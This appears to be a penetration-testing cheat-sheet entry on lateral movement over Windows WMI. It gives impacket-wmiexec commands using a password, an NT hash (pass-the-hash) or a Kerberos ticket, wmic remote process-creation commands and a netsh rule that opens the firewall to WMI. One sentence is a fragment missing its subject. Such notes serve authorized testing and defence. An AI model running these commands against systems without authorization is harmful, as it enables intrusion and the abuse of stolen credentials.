MS-WMI (Windows Management Instrumentation Remote Protocol) for Lateral Movement
- Credentials (password, NT hash, Kerberos TGT) of a member of the local Administrators group on the target machine.
- WMI allowed on firewall (by default: allowed on server, filtered on client machine).
WMI protocol is commonly used for remote machine administration tasks. WMI is accessed via negotiated TCP port (not a named pipe). It is separately handled by firewall rule. Logon via WMI is of the Network type (no reusable credentials).
# Using password
impacket-wmiexec $domain/$user:$password@$host
# Using NT hash
impacket-wmiexec -hashes :$nt_hash $domain/$user@$host
# Using Kerberos TGT
export KRB5CCNAME=$tgt_ccache_file
impacket-wmiexec $hostname -k -no-pass -dc-ip $dc_ip
has not been available since Windows 11.
WMI is very powerful. It can manage processes, services and scheduled tasks. Here I will show only a very basic use to create a process on a remote host. Note that firing this command will not return output. We need to save the output to a file and download it through another channel (e.g. via SMB).
# Using password
wmic /user:$domain\$user /password:$password /node:$host process call create "cmd.exe /c whoami.exe > C:\output.txt"
# Using Kerberos TGT (in-memory)
wmic /node:$host process call create $command
Keep in mind that there is a lof of techniques for executing code on a remote host using WMI and new ones are being discovered all the time.
Enable WMI
# Enable firewall rules
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes